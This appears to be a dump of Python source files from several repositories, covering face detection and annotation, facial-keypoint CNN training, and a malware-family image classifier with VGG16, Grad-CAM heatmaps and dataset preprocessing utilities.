return rgbFrame
def stream_to_image(file):
image = Image.open(cStringIO.StringIO(file.read()))
return image_to_nparray(image)
def file_to_image(path):
image = Image.open(path)
return image_to_nparray(image)
def string_to_image(image_string, head="data:image/jpeg;base64,"):
assert (image_string.startswith(head))
imgdata = base64.b64decode(image_string[len(head):])
imgF = StringIO.StringIO()
imgF.write(imgdata)
imgF.seek(0)
image = Image.open(imgF)
return image_to_nparray(image)
def annotate_face_info(image, detected_faces, faceDatabase):
annotated_frame = np.copy(image)
if detected_faces is None:
return annotated_frame
for detected_face in detected_faces:
bb = detected_face[1]
bl = (bb.left(), bb.bottom())
tr = (bb.right(), bb.top())
identity = detected_face[0]
if identity == -1:
name = "Unknown"
color = (152, 255, 204)
else:
user = faceDatabase.find_user_by_index(identity)
name = user.name
if user.kind is FaceKind.Normal:
color = (64, 255, 92)
elif user.kind is FaceKind.Missing:
color = (156, 117, 235)
elif user.kind is FaceKind.Wanted:
color = (240, 96, 93)
else:
color = (152, 255, 204)
probability = detected_face[2] * 100
cv2.rectangle(annotated_frame, bl, tr, color=color,
thickness=3)
cv2.putText(annotated_frame, name + '[' + str(round(probability, 1)) + '%]', (bb.left(), bb.top() - 10),
cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.75,
color=color, thickness=2)
return annotated_frame
def image_to_url(image):
img = Image.fromarray(image)
imgdata = StringIO.StringIO(img._repr_png_())
imgdata.seek(0)
content = 'data:image/png;base64,' + urllib.quote(base64.b64encode(imgdata.buf))
return content
def now_datetime_to_filename(ext):
now_time = datetime.datetime.now()
filename = '%02d%02d%02d%02d%02d%02d%04d.%s' % (
now_time.year % 100, now_time.month, now_time.day, now_time.hour, now_time.minute, now_time.second,
now_time.microsecond / 100, ext)
return filename
def get_inet_addr():
interfaces = netifaces.interfaces()
for i in interfaces:
if i == 'lo':
continue
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET)
if iface != None:
for j in iface:
return j['addr']
```
#### File: openface/alignment/naive_dlib.py
```python
import argparse
import cv2
import dlib
import numpy as np
import os
import random
import sys
from skimage import io
from .. import helper
from .. import data
class NaiveDlib:
def __init__(self, faceMean, facePredictor):
"""Initialize the dlib-based alignment."""
self.detector = dlib.get_frontal_face_detector()
self.normMeanAlignPoints = loadMeanPoints(faceMean)
self.predictor = dlib.shape_predictor(facePredictor)
def getAllFaceBoundingBoxes(self, img):
return self.detector(img, 1)
def getLargestFaceBoundingBox(self, img):
faces = self.detector(img, 1)
if len(faces) > 0:
return max(faces, key=lambda rect: rect.width() * rect.height())
def align(self, img, bb):
points = self.predictor(img, bb)
return list(map(lambda p: (p.x, p.y), points.parts()))
def alignImg(self, method, size, img, bb=None,
outputPrefix=None, outputDebug=False,
expandBox=False):
if outputPrefix:
helper.mkdirP(os.path.dirname(outputPrefix))
def getName(tag=None):
if tag is None:
return "{}.png".format(outputPrefix)
else:
return "{}-{}.png".format(outputPrefix, tag)
if bb is None:
try:
bb = self.getLargestFaceBoundingBox(img)
except Exception as e:
print("Warning: {}".format(e))
# In rare cases, exceptions are thrown.
return
if bb is None:
# Most failed detection attempts return here.
return
alignPoints = self.align(img, bb)
meanAlignPoints = transformPoints(self.normMeanAlignPoints, bb, True)
(xs, ys) = zip(*meanAlignPoints)
tightBb = dlib.rectangle(left=min(xs), right=max(xs),
top=min(ys), bottom=max(ys))
if method != 'tightcrop':
npAlignPoints = np.float32(alignPoints)
npMeanAlignPoints = np.float32(meanAlignPoints)
if method == 'tightcrop':
warpedImg = img
elif method == 'affine':
ss = np.array([39, 42, 57]) # Eyes and tip of nose.
npAlignPointsSS = npAlignPoints[ss]
npMeanAlignPointsSS = npMeanAlignPoints[ss]
H = cv2.getAffineTransform(npAlignPointsSS, npMeanAlignPointsSS)
warpedImg = cv2.warpAffine(img, H, np.shape(img)[0:2])
elif method == 'perspective':
ss = np.array([39, 42, 48, 54]) # Eyes and corners of mouth.
npAlignPointsSS = npAlignPoints[ss]
npMeanAlignPointsSS = npMeanAlignPoints[ss]
H = cv2.getPerspectiveTransform(
npAlignPointsSS, npMeanAlignPointsSS)
warpedImg = cv2.warpPerspective(img, H, np.shape(img)[0:2])
elif method == 'homography':
(H, mask) = cv2.findHomography(npAlignPoints, npMeanAlignPoints,
method=cv2.LMEDS)
warpedImg = cv2.warpPerspective(img, H, np.shape(img)[0:2])
else:
print("Error: method '{}' is unimplemented.".format(method))
sys.exit(-1)
if method == 'tightcrop':
wAlignPoints = alignPoints
else:
wBb = self.getLargestFaceBoundingBox(warpedImg)
if wBb is None:
return
wAlignPoints = self.align(warpedImg, wBb)
wMeanAlignPoints = transformPoints(
self.normMeanAlignPoints, wBb, True)
if outputDebug:
annotatedImg = annotate(img, bb, alignPoints, meanAlignPoints)
io.imsave(getName("orig"), img)
io.imsave(getName("annotated"), annotatedImg)
if method != 'tightcrop':
wAnnotatedImg = annotate(warpedImg, wBb,
wAlignPoints, wMeanAlignPoints)
io.imsave(getName("warped"), warpedImg)
io.imsave(getName("warped-annotated"), wAnnotatedImg)
if len(warpedImg.shape) != 3:
print(" + Warning: Result does not have 3 dimensions.")
return None
(xs, ys) = zip(*wAlignPoints)
xRange = max(xs) - min(xs)
yRange = max(ys) - min(ys)
if expandBox:
(l, r, t, b) = (min(xs) - 0.20 * xRange, max(xs) + 0.20 * xRange,
min(ys) - 0.65 * yRange, max(ys) + 0.20 * yRange)
else:
(l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))
(w, h, _) = warpedImg.shape
if 0 <= l <= w and 0 <= r <= w and 0 <= b <= h and 0 <= t <= h:
cwImg = cv2.resize(warpedImg[t:b, l:r], (size, size))
h, edges = np.histogram(cwImg.ravel(), 16, [0, 256])
s = sum(h)
if any(h > 0.65 * s):
print("Warning: Image is likely a single color.")
return
else:
print("Warning: Unable to align and crop to the "
"face's bounding box.")
return
if outputPrefix:
io.imsave(getName(), cwImg)
return cwImg
def transformPoints(points, bb, toImgCoords):
if toImgCoords:
def scale(p):
(x, y) = p
return (int((x * bb.width()) + bb.left()),
int((y * bb.height()) + bb.top()))
else:
def scale(p):
(x, y) = p
return (float(x - bb.left()) / bb.width(),
float(y - bb.top()) / bb.height())
return list(map(scale, points))
def loadMeanPoints(modelFname):
def parse(line):
(x, y) = line.strip().split(",")
return (float(x), float(y))
with open(modelFname, 'r') as f:
return [parse(line) for line in f]
def annotate(img, box, points=None, meanPoints=None):
a = np.copy(img)
bl = (box.left(), box.bottom())
tr = (box.right(), box.top())
cv2.rectangle(a, bl, tr, color=(153, 255, 204), thickness=3)
for p in points:
cv2.circle(a, center=p, radius=3, color=(102, 204, 255), thickness=-1)
for p in meanPoints:
cv2.circle(a, center=p, radius=3, color=(0, 0, 0), thickness=-1)
return a
```
#### File: 29/yong_celeb_recognize/image.py
```python
import cv2
from matplotlib import pyplot
import numpy as np
def read_sample(filenames):
images = []
for filename in filenames:
image = cv2.imread(filename)
image = cv2.resize(image, (96, 96))
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image_array = []
for y in range(0, 96, 1):
for x in range(0, 96, 1):
image_array.append((image[y][x] / 255.))
image_array = np.array(image_array)
image_array = image_array.astype(np.float32)
images.append(image_array)
return np.vstack(images)
def plot_sample(x, y, axis):
img = x.reshape(96, 96)
axis.imshow(img, cmap='gray')
axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)
def draw_result(X, y):
fig = pyplot.figure(figsize=(6, 6))
fig.subplots_adjust(
left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i in range(X.shape[0]):
ax = fig.add_subplot(4, 4, i + 1, xticks=[], yticks=[])
plot_sample(X[i], y[i], ax)
pyplot.show()
```
#### File: 29/yong_celeb_recognize/nn2.py
```python
import pickle
from matplotlib import pyplot
import os
import numpy as np
from pandas.io.parsers import read_csv
from sklearn.utils import shuffle
from lasagne import layers
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet, BatchIterator
FTRAIN = './data/training.csv'
FTEST = './data/test.csv'
SPECIALIST_SETTINGS = [
dict(
columns=(
'left_eye_center_x', 'left_eye_center_y',
'right_eye_center_x', 'right_eye_center_y',
),
flip_indices=((0, 2), (1, 3)),
),
dict(
columns=(
'nose_tip_x', 'nose_tip_y',
),
flip_indices=(),
kwargs=dict(dropout2_p=0.3, dropout3_p=0.4), # !
),
dict(
columns=(
'mouth_left_corner_x', 'mouth_left_corner_y',
'mouth_right_corner_x', 'mouth_right_corner_y',
'mouth_center_top_lip_x', 'mouth_center_top_lip_y',
),
flip_indices=((0, 2), (1, 3)),
),
dict(
columns=(
'mouth_center_bottom_lip_x',
'mouth_center_bottom_lip_y',
),
flip_indices=(),
),
dict(
columns=(
'left_eye_inner_corner_x', 'left_eye_inner_corner_y',
'right_eye_inner_corner_x', 'right_eye_inner_corner_y',
'left_eye_outer_corner_x', 'left_eye_outer_corner_y',
'right_eye_outer_corner_x', 'right_eye_outer_corner_y',
),
flip_indices=((0, 2), (1, 3), (4, 6), (5, 7)),
),
dict(
columns=(
'left_eyebrow_inner_end_x', 'left_eyebrow_inner_end_y',
'right_eyebrow_inner_end_x', 'right_eyebrow_inner_end_y',
'left_eyebrow_outer_end_x', 'left_eyebrow_outer_end_y',
'right_eyebrow_outer_end_x', 'right_eyebrow_outer_end_y',
),
flip_indices=((0, 2), (1, 3), (4, 6), (5, 7)),
),
]
def load(test=False, cols=None):
"""Loads data from FTEST if *test* is True, otherwise from FTRAIN.
Pass a list of *cols* if you're only interested in a subset of the
target columns.
"""
fname = FTEST if test else FTRAIN
df = read_csv(os.path.expanduser(fname)) # load pandas dataframe
# The Image column has pixel values separated by space; convert
# the values to numpy arrays:
df['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' '))
if cols: # get a subset of columns
df = df[list(cols) + ['Image']]
print(df.count()) # prints the number of values for each column
df = df.dropna() # drop all rows that have missing values in them
X = np.vstack(df['Image'].values) / 255. # scale pixel values to [0, 1]
X = X.astype(np.float32)
if not test: # only FTRAIN has any target columns
y = df[df.columns[:-1]].values
y = (y - 48) / 48 # scale target coordinates to [-1, 1]
X, y = shuffle(X, y, random_state=42) # shuffle train data
y = y.astype(np.float32)
else:
y = None
return X, y
class FlipBatchIterator(BatchIterator):
flip_indices = [
(0, 2), (1, 3),
(4, 8), (5, 9), (6, 10), (7, 11),
(12, 16), (13, 17), (14, 18), (15, 19),
(22, 24), (23, 25),
]
def transform(self, Xb, yb):
Xb, yb = super(FlipBatchIterator, self).transform(Xb, yb)
# Flip half of the images in this batch at random:
bs = Xb.shape[0]
indices = np.random.choice(bs, bs / 2, replace=False)
Xb[indices] = Xb[indices, :, :, ::-1]
if yb is not None:
# Horizontal flip of all x coordinates:
yb[indices, ::2] = yb[indices, ::2] * -1
# Swap places, e.g. left_eye_center_x -> right_eye_center_x
for a, b in self.flip_indices:
yb[indices, a], yb[indices, b] = (
yb[indices, b], yb[indices, a])
return Xb, yb
import theano
def float32(k):
return np.cast['float32'](k)
class AdjustVariable(object):
def __init__(self, name, start=0.03, stop=0.001):
self.name = name
self.start, self.stop = start, stop
self.ls = None
def __call__(self, nn, train_history):
if self.ls is None:
self.ls = np.linspace(self.start, self.stop, nn.max_epochs)
epoch = train_history[-1]['epoch']
new_value = float32(self.ls[epoch - 1])
getattr(nn, self.name).set_value(new_value)
class EarlyStopping(object):
def __init__(self, patience=100):
self.patience = patience
self.best_valid = np.inf
self.best_valid_epoch = 0
self.best_weights = None
def __call__(self, nn, train_history):
current_valid = train_history[-1]['valid_loss']
current_epoch = train_history[-1]['epoch']
if current_valid < self.best_valid:
self.best_valid = current_valid
self.best_valid_epoch = current_epoch
self.best_weights = nn.get_all_params_values()
elif self.best_valid_epoch + self.patience < current_epoch:
print("Early stopping.")
print("Best valid loss was {:.6f} at epoch {}.".format(
self.best_valid, self.best_valid_epoch))
nn.load_params_from(self.best_weights)
raise StopIteration()
def backupCNN(nn, train_history):
nn.save_params_to('net-epoch-step.pickle')
def loadNet2(netName):
net = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('dropout1', layers.DropoutLayer), # !
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('dropout2', layers.DropoutLayer), # !
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('dropout3', layers.DropoutLayer), # !
('hidden4', layers.DenseLayer),
('dropout4', layers.DropoutLayer), # !
('hidden5', layers.DenseLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 1, 96, 96),
conv1_num_filters=32, conv1_filter_size=(3, 3), pool1_pool_size=(2, 2),
dropout1_p=0.1, # !
conv2_num_filters=64, conv2_filter_size=(2, 2), pool2_pool_size=(2, 2),
dropout2_p=0.2, # !
conv3_num_filters=128, conv3_filter_size=(2, 2), pool3_pool_size=(2, 2),
dropout3_p=0.3, # !
hidden4_num_units=1000, # !
dropout4_p=0.5,
hidden5_num_units=1000, # !
output_num_units=30, output_nonlinearity=None,
update_learning_rate=theano.shared(float32(0.03)),
update_momentum=theano.shared(float32(0.9)),
regression=True,
batch_iterator_train=FlipBatchIterator(batch_size=128),
on_epoch_finished=[
AdjustVariable('update_learning_rate', start=0.03, stop=0.0001),
AdjustVariable('update_momentum', start=0.9, stop=0.999),
EarlyStopping(patience=200),
backupCNN,
],
max_epochs=10000,
verbose=1,
)
net.load_params_from(netName)
return net
def predcit2(net, X):
X = X.reshape(-1, 1, 96, 96)
return net.predict(X)
``` |
{
"source": "1Stohk1/tami",
"score": 3
} |
#### File: cati/utils/opcode.py
```python
import re
from cati.utils.cati_config import *
class Converter:
exDict = {}
def __init__(self):
"""Takes in input the text file in which is saved the dictionary to translate in OPCode"""
with open(DICTIONARY, encoding='utf-8') as f:
for line in f:
(key, val) = line.split(" -> ")
val = val.strip("\n")
self.exDict[key] = val
def __str__(self):
return f"These {self.exDict} are the words that will be converted"
def encoder(self, content):
"""For every word in the converting dictionary check if in the smali text
there is a correspondence, if true tranlate it in the opportune val of the key"""
for word, opcode in self.exDict.items():
content = re.sub(word, opcode, content)
return content
```
#### File: tami/models_code/VGG16.py
```python
from tensorflow.keras.layers import Dense, Flatten, Input
from tensorflow.keras.models import Model
from tensorflow.keras.applications import vgg16
from tensorflow.keras.metrics import Precision, Recall, AUC
class VGG16_19:
def __init__(self, num_classes, img_size, channels, weights='imagenet', name="VGG", include_top=False):
self.name = name
self.weights = weights
self.include_top = include_top
self.num_classes = num_classes
self.input_width_height = img_size
self.channels = channels
self.input_type = 'images'
def build(self):
base_model = None
output = None
if self.include_top:
if self.input_width_height != 224 or self.channels != 3:
print("IF include_top=True, input_shape MUST be (224,224,3), exiting...")
exit()
else:
if self.name == "VGG" or self.name == "VGG16":
base_model = vgg16.VGG16(weights=self.weights, include_top=True, classes=self.num_classes)
else:
print("Invalid name, accepted 'VGG1619', exiting...")
exit()
output = base_model.output
else:
inputs = Input(shape=(self.input_width_height, self.input_width_height, self.channels))
if self.name == "VGG" or self.name == "VGG16":
base_model = vgg16.VGG16(weights=self.weights, include_top=False, input_tensor=inputs)
else:
print("Invalid name, accepted 'VGG16', exiting...")
exit()
flatten = Flatten(name='my_flatten')
output_layer = Dense(self.num_classes, activation='softmax', name='my_predictions')
output = output_layer(flatten(base_model.output))
input_layer = base_model.input
model = Model(input_layer, output)
# model.summary(line_length=50)
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['acc', Precision(name="prec"), Recall(name="rec"), AUC(name='auc')])
return model
```
#### File: old_tool/utils_backup/apply_gradcam_cumulativeHeatmaps.py
```python
import math
from models_code.gradcam import GradCAM
from utils import config
from utils.handle_modes import process_path
import tensorflow as tf
import os
import numpy as np
import imutils
import random
import cv2
def merg_average_pic(pic1, pic2, shape):
pic_new = np.zeros(shape=(shape[0], shape[1]), dtype=int)
for i in range(shape[0]):
for j in range(shape[1]):
if len(shape) == 2:
try:
pic_new[i, j] = (int(pic1[i, j]) + int(pic2[i, j])) / 2
except RuntimeWarning:
print("CATCHED: {} {}".format(pic1[i, j], pic2[i, j]))
else:
for el in range(shape[2]):
pic_new[i, j, el] = (pic1[i, j, el] + pic2[i, j, el]) / 2
return pic_new
def merg_pics(list_of_pic):
shape = list_of_pic[0].shape
if len(shape) != 2:
print("ERRORE")
exit()
pic_new = np.zeros(shape=(shape[0], shape[1]), dtype='uint8')
pic_std = np.zeros(shape=(shape[0], shape[1]), dtype='uint8')
# Per each pixel i,j and per each image n, sum up the values and then...
for i in range(shape[0]):
for j in range(shape[1]):
temp = 0
for n in range(len(list_of_pic)):
temp += list_of_pic[n][i, j]
# diveded by the number of pic, to get an AVG pixel
pic_new[i, j] = temp / len(list_of_pic)
# Per each pixel i,j and per each image n, sum up the difference between the average (what is inside pic_new[i,j])
# and the pixel[i,j] of image n (to calculate the distance beetween that pixed to the average).
# then to the power of 2, divided by number of pics and squared to apply the formula for Standard Deviation
for i in range(shape[0]):
for j in range(shape[1]):
temp = 0
for n in range(len(list_of_pic)):
temp += (list_of_pic[n][i, j] - int(pic_new[i, j])) ** 2
pic_std[i, j] = math.sqrt(temp / len(list_of_pic))
return pic_new, pic_std
def apply_gradcam(arguments, model, class_info):
# initialize the gradient class activation map
cam = GradCAM(model)
for img_class in class_info["class_names"]:
# Adding also a '/' to ensure path correctness
label_path = config.main_path + arguments.dataset + "/test/" + img_class
# Get all file paths in 'label_path' for the class 'label'
files = [i[2] for i in os.walk(label_path)]
num_samples = 50
# Randomly extract 'num_sample' from the file paths, in files there is a [[files_paths1, filepath2,...]]
imgs = random.sample(files[0], num_samples)
gray_heatmaps = []
gray_heatmaps_WRONG = []
color_heatmaps = []
fixed_size_studyMap = 700
# create folder in /results/images for this class
if not os.path.isdir(config.main_path + 'results/images/' + img_class):
os.mkdir(config.main_path + 'results/images/' + img_class)
result_images_path = config.main_path + 'results/images/' + img_class
for i in range(num_samples):
complete_path = label_path + "/" + imgs[i]
img_filename = imgs[i].split(".")[0]
# load the original image from disk (in OpenCV format) and then
# resize the image to its target dimensions
orig = cv2.imread(complete_path)
# resized = cv2.resize(orig, (arguments.image_size, arguments.image_size))
image, _ = process_path(complete_path)
image = tf.expand_dims(image, 0)
# use the network to make predictions on the input imag and find
# the class label index with the largest corresponding probability
preds = model.predict(image)
i = np.argmax(preds[0])
# decode the ImageNet predictions to obtain the human-readable label
# decoded = imagenet_utils.decode_predictions(preds)
# (imagenetID, label, prob) = decoded[0][0]
# label = "{}: {:.2f}%".format(label, prob * 100)
correctness = "WRONG " if img_class != class_info["class_names"][int(i)] else ""
label = "{}{} - {:.1f}%".format(correctness, class_info["class_names"][int(i)], preds[0][i] * 100)
print("[INFO] {}".format(label))
# build the heatmap
heatmap = cam.compute_heatmap(image, i)
# resize to fixed size and add the heatmap to the study struct
# at this point the heatmap contains integer value scaled [0, 255]
heatmap_raw = heatmap.copy()
heatmap_raw = cv2.resize(heatmap_raw, (fixed_size_studyMap, fixed_size_studyMap))
if correctness == "":
gray_heatmaps.append(heatmap_raw)
else:
gray_heatmaps_WRONG.append(heatmap_raw)
# resize the resulting heatmap to the original input image dimensions
heatmap = cv2.resize(heatmap, (orig.shape[1], orig.shape[0]))
# overlay heatmap on top of the image
(heatmap, output) = cam.overlay_heatmap(heatmap, orig, alpha=0.5)
# heatmap_comparison for printing also heatmap alone with filename
heatmap_comparison = heatmap.copy()
# resize images
orig = imutils.resize(orig, width=400)
heatmap = imutils.resize(heatmap, width=400)
heatmap_comparison = imutils.resize(heatmap_comparison, width=400)
output = imutils.resize(output, width=400)
# create a black background to include text
black = np.zeros((35, orig.shape[1], 3), np.uint8)
black[:] = (0, 0, 0)
# concatenate vertically to the image
orig = cv2.vconcat((black, orig))
heatmap = cv2.vconcat((black, heatmap))
heatmap_comparison = cv2.vconcat((black, heatmap_comparison))
output = cv2.vconcat((black, output))
# write some text over each image
cv2.putText(orig, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
cv2.putText(heatmap, "Heatmap", (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
cv2.putText(heatmap_comparison, img_filename.split('_')[2], (10, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.6, (255, 255, 255))
cv2.putText(output, "Overlay with Heatmap", (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
# display the original image and resulting heatmap and output image
complete = np.hstack([orig, heatmap, output])
# complete = imutils.resize(complete, width=700)
semi_complete = np.hstack([orig, output])
# semi_complete = imutils.resize(semi_complete, width=350)
cv2.imwrite(result_images_path + '/complete_' + img_filename.split('_')[2] + '.png', complete)
# cv2.imwrite(result_images_path + '/semi_' + img_filename.split('_')[2] + '.png', semi_complete)
color_heatmaps.append(heatmap_comparison)
# Display images
# cv2.imshow("Original", orig)
# cv2.imshow("Heatmap", heatmap)
# cv2.imshow("Overlay", output)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# cv2.waitKey(0)
# for x in range(heatmap_new.shape[0]):
# for y in range(heatmap_new.shape[1]):
# if sum(heatmap_new[x, y]) < 325:
# heatmap_new[x, y] = np.array([0, 0, 0])
if num_samples >= 5:
valid_heatmap = []
for i in range(num_samples):
if color_heatmaps[i].shape == (435, 400, 3) and not np.all((color_heatmaps[i] == 0)):
valid_heatmap.append(i)
if len(valid_heatmap) == 5:
break
if len(valid_heatmap) == 5:
compared_heatmaps = np.hstack([color_heatmaps[valid_heatmap[0]], color_heatmaps[valid_heatmap[1]],
color_heatmaps[valid_heatmap[2]], color_heatmaps[valid_heatmap[3]],
color_heatmaps[valid_heatmap[4]]])
cv2.imwrite(result_images_path + '/comparison_' + img_class + '.png', compared_heatmaps)
# for n in range(num_samples):
# cv2.imwrite(main_path + 'results/images/gray_' + img_class + '_' + str(n) + '.png', gray_heatmaps[n])
# pic1 = merg_average_pic(gray_heatmaps[0], gray_heatmaps[1], gray_heatmaps[1].shape)
# cv2.imwrite(main_path + 'results/images/graysum1_' + img_class + '.png', pic1)
# pic2 = merg_average_pic(gray_heatmaps[2], gray_heatmaps[3], gray_heatmaps[2].shape)
# cv2.imwrite(main_path + 'results/images/graysum2_' + img_class + '.png', pic2)
# pic3 = merg_average_pic(pic1, pic2, pic1.shape)
# for x in range(pic1.shape[0]):
# print(pic3[x])
# cv2.imwrite(main_path + 'results/images/graysum3_' + img_class + '.png', pic3)
# merging heatmaps into one cumulative heatmap, creating also standard deviation image
print("[INFO] Generating Cumulative Heatmap for {}...".format(img_class), end='', flush=True)
pic_avg, pic_std = merg_pics(gray_heatmaps)
print("DONE!")
cv2.imwrite(result_images_path + '/grayscaleAVG_' + img_class + '.png', pic_avg)
cv2.imwrite(result_images_path + '/grayscaleSTD_' + img_class + '.png', pic_std)
# add color to cumulative heatmap and STD image
pic_avg_colored = cv2.applyColorMap(pic_avg, cv2.COLORMAP_VIRIDIS)
pic_std_colored = cv2.applyColorMap(pic_std, cv2.COLORMAP_VIRIDIS)
cv2.imwrite(result_images_path + '/colorAVG_' + img_class + '.png', pic_avg_colored)
cv2.imwrite(result_images_path + '/images/colorSTD_' + img_class + '.png', pic_std_colored)
# Store the raw heatmaps per family
for ind in range(len(gray_heatmaps)):
cv2.imwrite(result_images_path + '/heatmap_' + str(ind) + '.png', gray_heatmaps[ind])
j = len(gray_heatmaps)
for ind in range(len(gray_heatmaps)):
cv2.imwrite(result_images_path + '/heatmapWRONG_' + str(j) + '.png', gray_heatmaps[ind])
j += 1
# n_box = 50
# step = fixed_size_studyMap / n_box
# box = np.zeros(shape=(n_box, n_box), dtype=int)
# box_counter = np.zeros(shape=(n_box, n_box), dtype=int)
# xs = -1
# for x in range(fixed_size_studyMap):
# if x % step == 0:
# xs += 1
# ys = -1
# for y in range(fixed_size_studyMap):
# if y % step == 0:
# ys += 1
# box[xs, ys] += pic3[x, y]
# pixel_per_box = (fixed_size_studyMap / n_box) * (fixed_size_studyMap / n_box)
# print(box)
# print(box // pixel_per_box)
# Display images
# cv2.imshow("ONE", compl_heatmap[0])
# cv2.imshow("TWO", compl_heatmap[1])
# cv2.imshow("THREE", compl_heatmap[2])
# (heatmap_merg_1, output_merg_1) = cam.overlay_heatmap(compl_heatmap[0], compl_heatmap[1], alpha=0.4)
# cv2.imshow("MERGED_1", output_merg_1)
# (heatmap_merg_2, output_merg_2) = cam.overlay_heatmap(compl_heatmap[2], compl_heatmap[3], alpha=0.4)
# (heatmap_merg_3, output_merg_3) = cam.overlay_heatmap(output_merg_1, output_merg_2, alpha=0.4)
# cv2.imshow("MERGED_2", output_merg_2)
# semi_complete_merged1 = np.hstack([compl_heatmap[0], compl_heatmap[1], compl_heatmap[2], compl_heatmap[3]])
# semi_complete_merged1 = imutils.resize(semi_complete_merged1, height=450)
# cv2.imshow("BASELINE", semi_complete_merged1)
# semi_complete_merged2 = np.hstack([output_merg_1, output_merg_2, output_merg_3])
# semi_complete_merged2 = imutils.resize(semi_complete_merged2, height=400)
# cv2.imshow("MERGED", semi_complete_merged2)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_BASE1.png", semi_complete_merged1)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_MERGED1.png", semi_complete_merged2)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# (heatmap_merg_1, output_merg_1) = cam.overlay_heatmap(compl_heatmap[0], compl_heatmap[1], alpha=0.4)
# cv2.imshow("MERGED_1", output_merg_1)
# (heatmap_merg_2, output_merg_2) = cam.overlay_heatmap(compl_heatmap[2], compl_heatmap[3], alpha=0.4)
# (heatmap_merg_3, output_merg_3) = cam.overlay_heatmap(output_merg_1, output_merg_2, alpha=0.4)
# output_merg_1 = merg_average_pic(compl_heatmap[0], compl_heatmap[1], compl_heatmap[0].shape)
# output_merg_2 = merg_average_pic(compl_heatmap[2], compl_heatmap[3], compl_heatmap[2].shape)
# output_merg_3 = merg_average_pic(output_merg_1, output_merg_2, compl_heatmap[0].shape)
# cv2.imshow("MERGED_2", output_merg_2)
# semi_complete_merged1 = np.hstack([compl_heatmap[0], compl_heatmap[1], compl_heatmap[2], compl_heatmap[3]])
# semi_complete_merged1 = imutils.resize(semi_complete_merged1, height=450)
# cv2.imshow("BASELINE", semi_complete_merged1)
# semi_complete_merged2 = np.hstack([output_merg_1, output_merg_2, output_merg_3])
# semi_complete_merged2 = imutils.resize(semi_complete_merged2, height=400)
# cv2.imshow("MERGED", semi_complete_merged2)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_BASE2.png", semi_complete_merged1)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_MERGED2.png", semi_complete_merged2)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# cv2.waitKey(0)
# exit()
```
#### File: tami/utils/generic_utils.py
```python
from utils.config import *
# GLOBAL VAR
progr_bar_lenght = 20
def print_log(string, print_on_screen=False, print_on_file=True):
if print_on_screen:
print(string)
if print_on_file:
with open(main_path + 'results/exec_logs/' + timeExec + ".results", 'a') as logfile:
logfile.write(string + "\n")
```
#### File: tami/utils/preprocessing_data.py
```python
import os
import numpy as np
import pickle
import pathlib
from random import shuffle, choice
def get_info_dataset(dataset_path, update=False):
# TODO: Implements some checks to verify edits to the dataset from last pickle.dump(data)
storing_data_path = dataset_path + "/info.txt"
if update and os.path.exists(dataset_path + "/info.txt"):
os.remove(dataset_path + "/info.txt")
if os.path.isfile(storing_data_path):
with open(storing_data_path, 'rb') as filehandle:
data = pickle.load(filehandle)
class_info = data['class_info']
ds_info = data['ds_info']
# CHECKS if the paths stored match the DB
# TODO: This check just pick 3 elements and check existence, can be improved
if not os.path.exists(choice(ds_info['train_paths'])) or not os.path.exists(choice(ds_info['val_paths'])) \
or not os.path.exists(choice(ds_info['test_paths'])):
print(f"Dataset paths seem incorrect, "
f"you should update the dataset info running '-m DATA -d {dataset_path}")
exit()
# Shuffle elements
else:
shuffle(ds_info['train_paths'])
shuffle(ds_info['val_paths'])
shuffle(ds_info['final_training_paths'])
shuffle(ds_info['test_paths'])
else:
# Create dataset filepaths
train_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training/train")
for file in f if ".png" in file or ".jpg" in file]
val_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training/val")
for file in f if ".png" in file or ".jpg" in file]
final_training_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/training")
for file in f if ".png" in file or ".jpg" in file]
test_paths = [os.path.join(r, file) for r, d, f in os.walk(dataset_path + "/test")
for file in f if ".png" in file or ".jpg" in file]
ds_info = {'ds_type': 'images', 'train_paths': train_paths, 'val_paths': val_paths, 'test_paths': test_paths,
'final_training_paths': final_training_paths}
temp_class_names = np.array([item.name for item in pathlib.Path(dataset_path + "/training/train").glob('*')])
# Sort class_names to keep same order, which influence training in one-hot encore, over different machines
class_names = np.sort(temp_class_names, axis=-1)
nclasses = len(class_names)
class_info = {"class_names": class_names, "n_classes": nclasses}
# GENERAL STATS
size_train = len(train_paths)
size_val = len(val_paths)
size_test = len(test_paths)
class_info.update({"train_size": size_train, "val_size": size_val, "test_size": size_test, 'info': {}})
for name in class_names:
size_trainf = sum([len(files) for r, d, files in os.walk(dataset_path + "/training/train/{}".format(name))])
size_valf = sum([len(files) for r, d, files in os.walk(dataset_path + "/training/val/{}".format(name))])
size_testf = sum([len(files) for r, d, files in os.walk(dataset_path + "/test/{}".format(name))])
class_info['info']["{}".format(name)] = {}
class_info['info']["{}".format(name)]['TRAIN'] = size_trainf
class_info['info']["{}".format(name)]['VAL'] = size_valf
class_info['info']["{}".format(name)]['TEST'] = size_testf
